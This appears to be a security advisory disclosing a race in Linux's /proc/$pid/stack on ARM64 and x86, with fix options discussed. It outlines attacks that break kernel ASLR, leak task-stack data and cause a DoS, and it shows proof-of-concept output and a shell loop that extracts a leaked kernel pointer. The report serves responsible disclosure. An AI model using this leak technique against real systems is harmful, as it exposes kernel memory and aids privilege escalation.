Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack

This issue probably had the most impact on ARM64 kernels before commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in v4.17); luckily, that hardening patch was backported all the way to v4.4 (but not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized kernel stack of a task that is concurrently executing on another CPU. (x86 has a check, but that check is racy, and a comment also documents that it is racy.) This means that the kernel can potentially attempt to unwind an active task stack starting from an outdated frame pointer, causing the kernel to interpret new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the target's task stack area are dereferenced. On x86, it is also ensured that only stack frames whose saved instruction pointer points to some valid text section are printed; on ARM64, stack frames are printed independent of where the saved instruction pointer points. The format string element used for printing such stack traces is "%pB", which is normally used for writing information about kernel crashes to the console; on kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which falls back to printing raw addresses with "0x%lx" when an address can't be mapped to a symbol. On ARM64, the kernel ensures that stack frames are 16-byte-aligned.

This leads to three potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer and observe to which symbol the kernel maps it. This could be used both to break kernel text ASLR and (if the attacker doesn't have access to the kernel image anyway) to gain more fine-grained information about the layout of kernel code.

2.
An attacker can fake a stack frame that points to an arbitrary location in the task stack (subject to alignment constraints) in order to leak data stored at that address into the stack trace returned to userspace. (This is more practical on ARM64, but might also work on x86 if you only need to leak one byte at a time.)

3. A DoS that is, from my perspective, relatively boring: it looks as if building a loop out of stack frames whose saved instruction pointers point into scheduler code will send the task that is attempting to read /proc/$pid/stack into an endless loop.

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more normal way to spray things on the kernel stack in the right places), built with gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============

In terminal 3 (note that this requires kernel.kptr_restrict==1, kptr_restrict=0 prints garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc
#
==============

I'm not sure what the best fix for this is. 32-bit ARM is playing it safe and just refuses to print stack traces for non-current tasks if CONFIG_SMP is on:

==============
	if (tsk != current) {
#ifdef CONFIG_SMP
		/*
		 * What guarantees do we have here that 'tsk' is not
		 * running on another CPU?  For now, ignore it as we
		 * can't guarantee we won't explode.
		 */
		if (trace->nr_entries < trace->max_entries)
			trace->entries[trace->nr_entries++] = ULONG_MAX;
		return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)? That way, even if the unwind code gets some edge case wrong, it won't cause the disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is probably not so straightforward... One approach would be to fire an IPI to request that the target task dumps its own stack. Another approach might be to check somehow, between every time a pointer is read from the target's stack and the time it is dereferenced, whether the target task has been scheduled in the meantime. Perhaps by checking p->nvcsw, p->nivcsw and p->on_cpu, if that works without races? The reason I'd like to have more than just one check at the end for this approach is (non-speculative) side channels.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: jannh